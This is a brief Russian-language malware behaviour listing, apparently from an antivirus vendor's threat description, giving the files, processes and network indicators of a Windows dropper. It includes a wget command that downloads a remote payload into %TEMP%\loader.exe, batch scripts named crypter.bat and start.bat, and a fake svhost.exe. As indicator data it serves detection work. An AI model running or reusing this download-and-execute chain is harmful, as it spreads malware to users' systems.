Техническая информация
- <Текущая директория>\wget.exe http://08##.com/t9r --output-document=""%TEMP%\loader.exe""
- %TEMP%\%temp%.exe
- %WINDIR%\Temp\svhost.exe
- <SYSTEM32>\cmd.exe /c ""%TEMP%\2.tmp\crypter.bat" "
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\start.bat" "
- %TEMP%\2.tmp\crypter.bat
- <Текущая директория>\wget.exe
- %TEMP%\loader.exe
- %WINDIR%\Temp\svhost.exe
- %TEMP%\1.tmp\start.bat
- %TEMP%\%temp%.exe
- %WINDIR%\Temp\svhost.exe
- %TEMP%\1.tmp\start.bat
- '08##.com':80
- 08##.com/t9r
- DNS ASK 08##.com